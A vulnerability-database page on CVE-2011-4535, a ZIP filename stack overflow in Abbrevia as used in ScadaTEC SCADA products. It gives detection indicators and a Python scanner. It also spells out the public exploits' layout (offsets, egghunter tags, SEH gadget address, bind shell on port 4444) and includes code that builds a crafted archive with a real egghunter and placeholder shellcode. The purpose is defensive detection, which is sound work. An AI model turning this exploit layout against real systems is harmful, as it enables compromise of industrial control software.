cvebase
CVE-2011-4535
published 2012-04-03

CVE-2011-4535: Buffer overflow in TurboPower Abbrevia before 4.0, as used in ScadaTEC ScadaPhone 5.3.11.1230 and earlier, ScadaTEC ModbusTagServer 4.1.1.81 and earlier, and…

Priority: P3 (46) · CVSS 2.0: 6.8 (medium) · Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: public exploit available · EPSS: 27.00% (97.8th percentile)
Buffer overflow in TurboPower Abbrevia before 4.0, as used in ScadaTEC ScadaPhone 5.3.11.1230 and earlier, ScadaTEC ModbusTagServer 4.1.1.81 and earlier, and other products, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted ZIP file.

Affected (3 ranges)

Vendor           Product               Version range     Fixed in
craig_peterson   turbopower_abbrevia   <= 3.05           4.0 (per the description above)
scadatec         modbustagserver       <= 4.1.1.81       not listed
scadatec         scadaphone            <= 5.3.11.1230    not listed

Detection & IOCs (extracted from sources)

  • filename: scadatec.zip
  • port: 4444 (TCP; default bind-shell port of the public payloads)
  • address: pop esi; pop ebx; retn @ 0x004014F4 (ScadaPhone.exe). The source extraction labels this "registry"; it is an SEH handler / ROP gadget address inside the ScadaPhone.exe image, not a registry key.
  • bytes (ZIP local file header, PK\x03\x04, filename length \xe4\x0f = 0x0fe4 = 4068): \x50\x4b\x03\x04\x14\x00\x00\x00\x00\x00\xb7\xac\xce\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00
  • bytes (ZIP central directory header, PK\x01\x02, same filename length): \x50\x4b\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xb7\xac\xce\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00\x24\x00\x00\x00\x00\x00\x00\x00
  • bytes (ZIP end of central directory record, PK\x05\x06; one entry, central directory size 0x1012 = 46 + 4068 at offset 0x1002 = 30 + 4068): \x50\x4b\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00
  • bytes (little-endian dword 0x004014ac, an address in the same ScadaPhone.exe page as the gadget above): \xac\x14\x40\x00
  • bytes (egghunter tag, Metasploit module): zipz
  • bytes (egghunter tag, ModbusTagServer exploit): OMFG
  • bytes (trailing dword appended to the crafted filename, 0x7478741e little-endian): \x1e\x74\x78\x74
  • The malicious ZIP sets the filename length of its single entry to 0x0fe4 (4068 bytes: 4064 bytes of exploit data plus a 4-byte trailer) to trigger the stack buffer overflow in the Abbrevia 3.x ZIP handling component. In a well-formed local file header the filename length is the little-endian 16-bit value at offset 26, after the CRC, compressed size and uncompressed size, so parse that field and flag entries whose declared length is far beyond normal values; legitimate archive names are rarely longer than a few hundred bytes.
  • The central directory entry repeats the oversized filename field, so the local header and the central directory header carry the same anomalous length bytes \xe4\x0f, and the end-of-central-directory record is consistent with them (central directory size 0x1012 = 46 + 4068, offset 0x1002 = 30 + 4068). A structural validity check therefore does not reject the file; the length itself is the signal.
  • For the ModbusTagServer target, the public exploit places an egghunter with the tag 'OMFG' in the filename field at offset 229, followed by 48 bytes of padding, the nSEH/SEH overwrite and the shellcode. Detect ZIP entries whose filename field contains egghunter machine code instead of printable characters.
  • For the ScadaPhone target, the public exploit uses a ROP chain starting at offset 57 within the filename field and overwrites the SEH handler with 0x004014F4 (pop esi; pop ebx; retn from ScadaPhone.exe). Because the image loads at its 0x00400000 preferred base, its addresses appear in the filename as little-endian dwords ending in \x40\x00; flag filenames containing runs of such dwords.
  • The Metasploit module generates a ZIP with a randomly named file built as 229 uppercase alpha characters + egghunter + padding + jmp short (-50) + 2 bytes + return address + 100 bytes + egg + filler to 4064 bytes + trailing dword 0x7478741e (\x1e\x74\x78\x74). With the trailer that is exactly the 4068 (0x0fe4) bytes declared in the headers above, so a rule requiring a filename length of 4096 or more misses this sample; key on the trailer bytes and on any declared length above a sane maximum instead.
  • The default payload of the public exploits is a bind shell on TCP port 4444; alert when ScadaPhone.exe or ModbusTagServer.exe opens a listening socket or accepts a connection on 4444, and treat any network activity from these processes as suspicious, since port and payload type (bind or reverse) are trivially changed by the attacker.
  • The egghunter tag used by the Metasploit module is 'zipz' (bytes 7a 69 70 7a, written 0x7a69707a in byte order; the hunter compares it as the little-endian dword 0x7a70697a). Metasploit writes the tag twice in front of the payload, so the file contains 'zipzzipz' as well as the tag inside the hunter's immediate; scan process memory or network payloads for this tag in conjunction with ScadaTEC product processes.
  • Payload bad characters are \x00, \x0a and \x0d, so the shellcode and egghunter in a malicious filename will not contain null bytes, line feeds or carriage returns; use this to tune shellcode signatures. Note that the SEH overwrite address 0x004014F4 itself contains a null byte, so do not expect the whole filename field to be null-free.
  • The exploit requires user interaction: a victim must open the crafted ZIP file with the affected ScadaPhone or ModbusTagServer application. It is not a zero-click remote exploit.
  • The ROP gadget and SEH handler addresses in the public exploits are hardcoded for specific module builds (ScadaPhone.exe and the Abbrevia DLLs at fixed base addresses); a different binary version, or forced relocation of the image, breaks these offsets.
  • The Metasploit target is labelled 'Windows Universal' but relies on a fixed address in ScadaPhone.exe. Because that image is not ASLR-enabled, the address is the same on every Windows version unless mandatory ASLR (EMET or Exploit Protection) forces relocation; what actually pins the exploit is the exact ScadaPhone.exe build, and the egghunter and shellcode additionally need DEP to be off for the process, which is the case under the default opt-in DEP policy unless the binary opts in.
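The detection bullets above describe a scanner in prose; the following Python script is an added example written for this page (not the Metasploit module, nor ScadaTEC or Abbrevia code) that implements them. It walks local file headers by signature instead of trusting the central directory, reads the filename length at header offset 26, and flags the oversized length, the 'zipz'/'OMFG' tags, the \x1etxt trailer, and little-endian dwords inside an assumed 0x00400000..0x0040FFFF window for a non-ASLR ScadaPhone.exe. The 1024-byte threshold, the image window, and the two constructed archives (one benign, one laid out like the module's filename with int3 stand-in shellcode) are assumptions; the egghunter bytes are skape's public NtAccessCheckAndAuditAlarm hunter with the page's tag.

```python
import struct

# Signatures of the three ZIP records quoted in the IOC list above.
LOCAL_SIG = b"PK\x03\x04"
CENTRAL_SIG = b"PK\x01\x02"
EOCD_SIG = b"PK\x05\x06"

# Detection parameters. Tags, trailer and the gadget address come from the page;
# the length threshold and the image window are assumptions for this example.
MAX_SANE_FILENAME = 1024                      # real archive names are far shorter
EGG_TAGS = (b"zipz", b"OMFG")                 # egghunter tags of the public exploits
MSF_TRAILER = b"\x1e\x74\x78\x74"             # dword appended by the Metasploit module
IMAGE_LO, IMAGE_HI = 0x00400000, 0x0040FFFF   # assumed non-ASLR ScadaPhone.exe window
SCADAPHONE_RET = 0x004014F4                   # pop esi; pop ebx; retn (page IOC)

# skape's 32-byte NtAccessCheckAndAuditAlarm egghunter carrying the 'zipz' tag as
# its immediate; used only to make the constructed sample realistic.
EGGHUNTER = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef"
             b"\xb8zipz\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")


def parse_local_headers(data):
    """Return one dict per local file header found by signature scan.

    Neither the central directory nor the declared sizes are trusted (both are
    attacker-controlled), so the scan advances 4 bytes past each signature instead
    of jumping by the compressed size.  The filename length is the little-endian
    uint16 at offset 26 of the 30-byte fixed header."""
    entries = []
    pos = data.find(LOCAL_SIG)
    while pos >= 0 and pos + 30 <= len(data):
        fnlen, extralen = struct.unpack_from("<HH", data, pos + 26)
        name = data[pos + 30:pos + 30 + fnlen]
        entries.append({"offset": pos, "fnlen": fnlen, "name": name,
                        "truncated": len(name) < fnlen})
        pos = data.find(LOCAL_SIG, pos + 4)
    return entries


def image_addresses(name, lo=IMAGE_LO, hi=IMAGE_HI):
    """Distinct little-endian dwords in name that fall inside [lo, hi]."""
    hits = set()
    for i in range(len(name) - 3):
        value = struct.unpack_from("<I", name, i)[0]
        if lo <= value <= hi:
            hits.add(value)
    return sorted(hits)


def scan_zip(data):
    """Apply the IOCs to every entry; returns (finding, header_offset, detail) tuples."""
    findings = []
    for e in parse_local_headers(data):
        name = e["name"]
        if e["fnlen"] > MAX_SANE_FILENAME:
            findings.append(("oversized_filename", e["offset"], e["fnlen"]))
        if e["truncated"]:
            findings.append(("filename_exceeds_file", e["offset"], e["fnlen"]))
        for tag in EGG_TAGS:
            if tag in name:
                findings.append(("egg_tag", e["offset"], tag.decode()))
        if name.endswith(MSF_TRAILER):
            findings.append(("msf_trailer", e["offset"], MSF_TRAILER.hex()))
        for addr in image_addresses(name):
            findings.append(("scadaphone_image_address", e["offset"], hex(addr)))
    return findings


def build_zip(filename, content=b""):
    """Constructed minimal STORED archive (CRC left at 0; DOS time/date copied from
    the header bytes above): local header, central directory entry, EOCD record."""
    lf = LOCAL_SIG + struct.pack("<HHHHHIIIHH", 20, 0, 0, 0xACB7, 0x34CE, 0,
                                 len(content), len(content), len(filename), 0)
    lf += filename + content
    cd = CENTRAL_SIG + struct.pack("<HHHHHHIIIHHHHHII", 20, 20, 0, 0, 0xACB7, 0x34CE,
                                   0, len(content), len(content), len(filename),
                                   0, 0, 0, 1, 0x24, 0)
    cd += filename
    eocd = EOCD_SIG + struct.pack("<HHHHIIH", 0, 0, 1, 1, len(cd), len(lf), 0)
    return lf + cd + eocd


def build_crafted_name():
    """Filename laid out like the Metasploit module described above: 229 junk bytes,
    egghunter, 48 bytes padding, nSEH (jmp short -50 plus 2 bytes), SEH handler,
    100 junk bytes, egg (tag twice) plus stand-in shellcode (int3s), filler to 4064
    bytes, then the 4-byte trailer, for 4068 = 0x0fe4 bytes in total."""
    name = b"A" * 229 + EGGHUNTER + b"B" * 48
    name += b"\xeb\xce" + b"\x41\x41"                  # nSEH: jmp short -50, filler
    name += struct.pack("<I", SCADAPHONE_RET)          # SEH: pop esi; pop ebx; retn
    name += b"C" * 100 + b"zipzzipz" + b"\xcc" * 64    # egg + stand-in shellcode
    name += b"D" * (4064 - len(name))
    return name + MSF_TRAILER


if __name__ == "__main__":
    for label, archive in (("benign", build_zip(b"report.txt", b"hello")),
                           ("crafted", build_zip(build_crafted_name()))):
        print(label, scan_zip(archive))
```

The signature walk is deliberate: a library such as zipfile locates entries through the central directory, so an archive whose central directory omits or mis-describes the oversized entry would hide it from the scanner while the vulnerable parser still reads the local header. Note also that the constructed crafted archive reproduces the page's own EOCD values (central directory size 0x1012 at offset 0x1002), which is why the 4064 + 4 = 4068 reading of the filename length is the one a rule should key on.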